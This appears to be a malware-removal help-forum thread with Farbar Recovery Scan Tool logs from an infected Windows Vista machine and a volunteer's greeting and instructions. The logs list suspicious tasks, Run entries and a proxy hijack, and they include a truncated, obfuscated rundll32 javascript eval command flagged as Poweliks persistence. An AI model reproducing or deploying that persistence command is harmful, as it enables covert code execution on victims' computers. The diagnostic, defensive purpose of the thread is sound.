Task: {A8BB84DE-677F-48BE-9A35-D1D1A2A0AD5D} - System32\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290 => C:\Program Files\Google\Update\GoogleUpdate.exe [2014-10-20] (Google Inc.)
Task: {A9462BA2-5504-4C3E-8B84-0D9A2F7FC854} - System32\Tasks\582b9f80 => C:\Users\Tyler\AppData\Local\Temp\\setup954247552.exe <==== ATTENTION
Task: {B6A9B53F-7B1E-460E-8B25-417D3CE85E46} - \4104635328 No Task File <==== ATTENTION
Task: {B90EC509-EFFD-479F-B674-1098EF69ADE3} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [2012-09-19] (Google Inc.)
Task: {BA07379C-921B-4AB1-8585-733D746B82DD} - \3975815936 No Task File <==== ATTENTION
Task: {BB542176-A526-4360-A650-B4A433AA62BA} - \3426028800 No Task File <==== ATTENTION
Task: {C090D641-39F5-4A04-88FD-0FF938662580} - System32\Tasks\win4036e0 => C:\Users\Tyler\AppData\Local\Temp\win4036e0.dat <==== ATTENTION
Task: {C15A3FCC-C99B-46B5-9D09-024F7268B652} - \3436031516 No Task File <==== ATTENTION
Task: {CCC2CDBA-04B8-4B4E-BB8E-2FB9747E7DEB} - System32\Tasks\a0168f00 => C:\Users\Tyler\AppData\Local\Temp\\setup2160826624.exe <==== ATTENTION
Task: {D5C774FE-AA3F-4944-BC4D-6DC2983A11AC} - \1067678144 No Task File <==== ATTENTION
Task: {DFDCAB67-7DAA-42D9-9555-A6C60AD5F35B} - \1015687112 No Task File <==== ATTENTION
Task: {EBC8DC2B-B1E1-4B3B-AD7B-6A54AC321E13} - System32\Tasks\p9pl388102792662700970 => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <==== ATTENTION
Task: {ECA6FEB7-4FF1-4A7F-8724-E8C80FD48DFB} - System32\Tasks\c52a4280 => C:\Users\Tyler\AppData\Local\Temp\\setup372887936.exe <==== ATTENTION
Task: {F054D8E5-C40B-40BF-991E-1BFD143B3D9E} - \193991460 No Task File <==== ATTENTION
Task: {FB20997B-71A1-4145-9D52-A9166159F737} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1cf2ca2e648d290.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfec4f46187060.job => C:\Program Files\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000Core.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskUserS-1-5-21-879967681-4271235005-1519339517-1000UA1cfeb0948c7c370.job => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe
 
==================== Loaded Modules (whitelisted) =============
 
2012-01-04 07:03 - 2009-11-04 13:14 - 00157696 _____ () C:\Windows\system32\spool\PRTPROCS\W32X86\lxecdrpp.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2009-03-15 21:15 - 2008-12-22 05:32 - 00054784 _____ () C:\Windows\System32\bcmwlrmt.dll
2014-11-08 21:45 - 2014-11-08 21:45 - 00382848 ____N () C:\ProgramData\Windows Genuine Advantage\{8B34E930-277B-48EB-A692-D7FDBB372FCD}\msiexec.exe
2014-10-17 02:42 - 2014-10-17 02:42 - 00284160 _____ () C:\Windows\assembly\NativeImages_v2.0.50727_32\VistaBridgeLibrary\df2a920b8e863d14ab8503f96c7b3ecd\VistaBridgeLibrary.ni.dll
2014-10-27 14:27 - 2014-10-21 23:04 - 08910664 _____ () C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\pdf.dll
2014-10-27 14:27 - 2014-10-21 23:04 - 01681224 _____ () C:\Users\Tyler\AppData\Local\Google\Chrome\Application\38.0.2125.111\ffmpegsumo.dll
 
==================== Alternate Data Streams (whitelisted) =========
 
(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:5D432CE3
 
==================== Safe Mode (whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Wdf01000.sys => ""="Driver"
 
==================== EXE Association (whitelisted) =============
 
(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)
 
 
==================== MSCONFIG/TASK MANAGER disabled items =========
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: AESTFilters => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: asurscsi => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: DockLoginService => 2
MSCONFIG\Services: GameConsoleService => 3
MSCONFIG\Services: GoToAssist => 3
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: gusvc => 3
MSCONFIG\Services: hnmsvc => 2
MSCONFIG\Services: IAANTMON => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: lxec_device => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: sprtsvc_DellSupportCenter => 2
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: stllssvr => 3
MSCONFIG\Services: UMVPFSrv => 2
 
========================= Accounts: ==========================
 
Administrator (S-1-5-21-879967681-4271235005-1519339517-500 - Administrator - Disabled)
Guest (S-1-5-21-879967681-4271235005-1519339517-501 - Limited - Disabled)
Tyler (S-1-5-21-879967681-4271235005-1519339517-1000 - Administrator - Enabled) => C:\Users\Tyler
 
==================== Faulty Device Manager Devices =============
 
Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft Tun Miniport Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunmp
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (11/09/2014 04:00:11 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application iexplore.exe, version 9.0.8112.16584, time stamp 0x4549b14e, faulting module MSHTML.dll, version 9.0.8112.16584, time stamp 0x541cb3c5, exception code 0xc0000005, fault offset 0x00260cee,
process id 0x2f00, application start time 0xiexplore.exe0.
 
Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:16 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\JS> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:15 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\WHITE-ON-BLACK> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:14 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\RETINA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:14 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\RETINA> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
Error: (11/09/2014 03:57:13 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\TYLER\APPDATA\LOCAL\SKYPE\APPS\LOGIN\IMAGES\NORMAL> in the hash map cannot be updated.
 
Context:  Application, SystemIndex Catalog
 
 
Details:
A device attached to the system is not functioning.   (0x8007001f)
 
 
System errors:
=============
Error: (11/08/2014 09:47:50 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: McAfee Anti-Malware Core150001Restart the service
 
Error: (11/08/2014 09:24:28 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/08/2014 09:18:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058
 
Error: (11/08/2014 09:18:14 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058
 
Error: (11/08/2014 09:18:09 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/08/2014 08:54:27 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (11/08/2014 08:51:30 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {209500FC-6B45-4693-8871-6296C4843751}
 
Error: (11/08/2014 08:46:40 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalLaunch{C97FCC79-E628-407D-AE68-A06AD6D8B4D1}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)
 
Error: (11/08/2014 08:46:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 NDIS 6 Adapter Driver%%1058
 
Error: (11/08/2014 08:46:38 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Intel® PRO/1000 PCI Express Network Connection Driver%%1058
 
 
Microsoft Office Sessions:
=========================
 
CodeIntegrity Errors:
===================================
  Date: 2014-11-09 06:04:55.240
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:51.421
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:46.506
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:41.715
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:33.745
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:31.596
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:28.678
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:04:25.676
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mbamchameleon.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:02:25.497
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
  Date: 2014-11-09 06:02:22.656
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\drivers\mwac.sys because the set of per-page image hashes could not be found on the system.
 
 
==================== Memory info =========================== 
 
Processor: Pentium® Dual-Core CPU T4200 @ 2.00GHz
Percentage of memory in use: 60%
Total physical RAM: 3033.63 MB
Available physical RAM: 1184.88 MB
Total Pagefile: 6269.51 MB
Available Pagefile: 3676.27 MB
Total Virtual: 2047.88 MB
Available Virtual: 1877.33 MB
 
==================== Drives ================================
 
Drive c: (OS) (Fixed) (Total:218.2 GB) (Free:35.88 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive e: (RECOVERY) (Fixed) (Total:14.65 GB) (Free:8.72 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 232.9 GB) (Disk ID: 2F03C1E0)
Partition 1: (Not Active) - (Size=39 MB) - (Type=DE)
Partition 2: (Not Active) - (Size=14.6 GB) - (Type=07 NTFS)
Partition 3: (Active) - (Size=218.2 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================

Hello booya119 and welcome! My name is Borislav and I will be glad to help you solve your malware problem.

Please note:

  • If you are a paying customer, you have the privilege to contact the help desk at Consumer Support. If you choose this option to get help, please let me know.
  • I recommend that you keep the instructions I will be giving you so that they are available to you at any time. You can save them in a text file or print them.
  • Make sure you read all of the instructions and fixes thoroughly before continuing with them.
  • Follow my instructions strictly and don’t hesitate to stop and ask me if you have any questions.
  • Post your log files, don't attach them. Every log file should be copy/pasted in your next reply.
  • Do not perform any kind of scanning and fixing without my instructions. If you want to proceed on your own, please let me know.
Sorry for the delay!

Do you still need help? If you still need help, please manually delete FRST.exe, download a new fresh one and generate log files.


Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 13-11-2014 01

Ran by Tyler (administrator) on TYLER-PC on 13-11-2014 18:59:29

Running from C:\Users\Tyler\Downloads

Loaded Profile: Tyler (Available profiles: Tyler)

Platform: Microsoft® Windows Vista™ Home Premium  Service Pack 2 (X86) OS Language: English (United States)

Internet Explorer Version 9

Boot Mode: Normal


 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt.inf_ae0b52e0\stacsv.exe

(Microsoft Corporation) C:\Windows\System32\SLsvc.exe

(Microsoft Corporation) C:\Windows\System32\wlanext.exe

(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe

(McAfee, Inc.) C:\Windows\System32\mfevtps.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\AMCore\mcshield.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\SystemCore\mfefire.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe

(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe

(Intel Corporation) C:\Windows\System32\igfxsrvc.exe

(Intel Corporation) C:\Windows\System32\hkcmd.exe

(Intel Corporation) C:\Windows\System32\igfxpers.exe

(Dell Inc.) C:\Program Files\Dell\QuickSet\quickset.exe

(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe

() C:\Program Files\DivX\DivX Update\DivXUpdate.exe

(SupportSoft, Inc.) C:\Program Files\Dell Support Center\bin\sprtcmd.exe

(Dell Inc.) C:\Windows\System32\WLTRAY.EXE

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe

(Oracle Corporation) C:\Program Files\Common Files\Java\Java Update\jusched.exe

(McAfee, Inc.) C:\Program Files\Common Files\Mcafee\Platform\McUICnt.exe

(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe

() C:\Program Files\Pando Networks\Media Booster\PMB.exe

(Microsoft Corporation) C:\Windows\ehome\ehtray.exe

(Stardock Corporation) C:\Program Files\Dell\DellDock\DellDock.exe

(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe

(Microsoft Corporation) C:\Windows\System32\taskmgr.exe

(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe

(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe

(Microsoft Corporation) C:\Windows\System32\conime.exe

(Microsoft Corporation) C:\Windows\System32\dllhost.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe

(Microsoft Corporation) C:\Windows\System32\wuauclt.exe

(McAfee, Inc.) C:\Program Files\McAfee\VirusScan\mcods.exe

 

 

==================== Registry (Whitelisted) ==================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [Windows Defender] => C:\Program Files\Windows Defender\MSASCui.exe [1008184 2008-01-20] (Microsoft Corporation)

HKLM\...\Run: [sysTrayApp] => C:\Program Files\IDT\WDM\sttray.exe [483420 2008-12-14] (IDT, Inc.)

HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2011-10-24] (Apple Inc.)

HKLM\...\Run: [QuickSet] => C:\Program Files\Dell\QuickSet\QuickSet.exe [1662032 2008-08-27] (Dell Inc.)

HKLM\...\Run: [PDVDDXSrv] => C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe [128296 2008-05-23] (CyberLink Corp.)

HKLM\...\Run: [mcui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)

HKLM\...\Run: [mcpltui_exe] => C:\Program Files\McAfee.com\Agent\mcagent.exe [517392 2014-04-25] (McAfee, Inc.)

HKLM\...\Run: [iAAnotif] => C:\Program Files\Intel\Intel Matrix Storage Manager\iaanotif.exe [178712 2008-05-07] (Intel Corporation)

HKLM\...\Run: [DivXUpdate] => C:\Program Files\DivX\DivX Update\DivXUpdate.exe [1263952 2013-02-12] ()

HKLM\...\Run: [DivXMediaServer] => C:\Program Files\DivX\DivX Media Server\DivXMediaServer.exe [450560 2013-01-29] (DivX, LLC)

HKLM\...\Run: [dellsupportcenter] => C:\Program Files\Dell Support Center\bin\sprtcmd.exe [206064 2008-10-04] (SupportSoft, Inc.)

HKLM\...\Run: [broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [3810304 2008-12-22] (Dell Inc.)

HKLM\...\Run: [APSDaemon] => C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)

HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [200704 2008-09-04] (Alps Electric Co., Ltd.)

HKLM\...\Run: [amd_dc_opt] => C:\Program Files\AMD\Dual-Core Optimizer\amd_dc_opt.exe [77824 2008-07-22] (AMD)

HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500208 2010-03-06] (Adobe Systems Incorporated)

HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2012-12-19] (Adobe Systems Incorporated)

HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2012-12-03] (Adobe Systems Incorporated)

HKLM\...\Run: [sunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)

HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)

HKLM\...\RunOnce: [b Register C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll] => "C:\Windows\system32\rundll32.exe" "C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll",DllRegisterServer

Winlogon\Notify\GoToAssist: C:\Program Files\Citrix\GoToAssist\514\G2AWinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)

HKLM\...\Policies\Explorer: [NoControlPanel] 0

HKLM\...\Policies\Explorer: [NoFolderOptions] 0

HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter

HKU\S-1-5-19\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter

HKU\S-1-5-20\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [winupd] => C:\Users\Tyler\AppData\Local\Temp:winupd.exe

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [Pando Media Booster] => C:\Program Files\Pando Networks\Media Booster\PMB.exe [3077528 2011-08-17] ()

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [p9pl5944863637826728850] => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl5944863637826728850.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [p9pl388102792662700970] => \\?\globalroot\Device\HarddiskVolume3\Users\Tyler\AppData\Local\Temp\p9pl388102792662700970.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3882312 2008-12-02] (Microsoft Corporation)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [Google Update] => C:\Users\Tyler\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2012-09-19] (Google Inc.)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [125952 2008-01-20] (Microsoft Corporation)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [-694390270] => C:\Users\Tyler\AppData\Local\Temp\thpm3029530543124544682.tmp <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [{79BF4901-1EC4-4726-B3C2-A7859706C6E7}] => "C:\Users\Tyler\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\QZDS6Q57\LeagueofLegends_NA_Installer_05_07_13.exe" /cmdloc "HKCU\Software\Riot Games AiTemp\{79BF4901-1EC4-4726-B3 (the data entry has 17 more characters).

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [EvolveClient] => C:\Program Files\Echobit\Evolve\EvolveClient.exe [3332512 2014-09-23] (Echobit LLC)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [DellSystemDetect] => C:\Users\Tyler\AppData\Local\Apps\2.0\BB45JB1N.PVP\VOEHN7TA.V0B\dell..tion_0f612f649c4a10af_0005.0007_59de4fd2458fcaec\DellSystemDetect.exe [254976 2014-05-08] (Dell)

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Run: [acillao] => rundll32 "C:\Users\Tyler\AppData\Local\acillao.dll",acillao <===== ATTENTION

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

HKU\S-1-5-21-879967681-4271235005-1519339517-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

HKU\S-1-5-18\...\Winlogon: [shell] C:\Windows\Explorer.exe [2926592 2009-04-11] (Microsoft Corporation) <==== ATTENTION 

Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Dell Remote Access.lnk

ShortcutTarget: Dell Remote Access.lnk -> c:\Windows\Installer\{F66A31D9-7831-4FBA-BA02-C411C0047CC5}\NewShortcut10_F66A31D978314FBABA02C411C0047CC5.exe (Macrovision Corporation)

Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk

ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

ProxyServer: ftp=127.0.0.1:52081;http=127.0.0.1:52081;https=127.0.0.1:52081

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://search.msn.com/spbasic.htm

HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank

HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch

SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = 

BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)

BHO: DivX Plus Web Player HTML5 <video> -> {326E768D-4182-46FD-9C16-1449A49795F4} -> C:\Program Files\DivX\DivX Plus Web Player\ie\DivXHTML5\DivXHTML5.dll (DivX, LLC)

